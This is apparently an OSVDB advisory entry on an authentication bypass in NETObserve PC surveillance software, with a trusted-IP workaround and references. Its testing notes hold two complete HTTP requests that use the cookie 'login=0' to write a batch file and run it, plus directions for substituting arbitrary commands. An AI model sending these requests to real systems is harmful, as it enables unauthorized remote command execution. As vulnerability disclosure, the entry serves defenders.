NETObserve User Authentication Bypass

2003-12-30T04:24:47
ID OSVDB:3256
Type osvdb
Reporter OSVDB
Modified 2003-12-30T04:24:47

Description

Vulnerability Description

The NETObserve PC surveillance software uses a web service to provide remote access to the monitored PC. This web service requires a username and password to access, however this authentication can be bypassed by specifying the cookie value of 'login=0'. Once access has been obtained, all features of the NetObserve system are available, including the ability to upload files and execute commands.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s):

Configure the NETObserve service to only allow trusted IP addresses to connect.

Short Description

The NETObserve PC surveillance software uses a web service to provide remote access to the monitored PC. This web service requires a username and password to access, however this authentication can be bypassed by specifying the cookie value of 'login=0'. Once access has been obtained, all features of the NetObserve system are available, including the ability to upload files and execute commands.

Manual Testing Notes

The following two HTTP requests will execute commands via the windows command interpreter on the remote system:

REQUEST #1:


POST /sendeditfile HTTP/1.1 Accept: / Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat? Content-Type: application/x-www-form-urlencoded Host: AnyHostWillDo Content-Length: 25 Cookie: login=0

newfiledata=cmd+%2Fc+calc

REQUEST #2:


GET /runfile=?C:\windows\win.bat? HTTP/1.1 Accept: / Host: AnyHostWillDo Cookie: login=0


To change the commands to be run, just alter the 'Content-Length' of the first request to be the length of the line of commands, including the string 'newfiledata='. Then alter the data being posted under 'newfiledata', remembering to replace spaces with '+' and encode any common HTTP characters, like '/' as hexadecimal values, '%2F' in this instance.

These specific requests sent unaltered will execute the windows calculator.

References:

Vendor URL: http://www.exploreanywhere.com/no-intro.php Secunia Advisory ID:10511 Other Advisory URL: http://www.elitehaven.net/netobserve.txt Nessus Plugin ID:11971 Bugtraq ID: 9319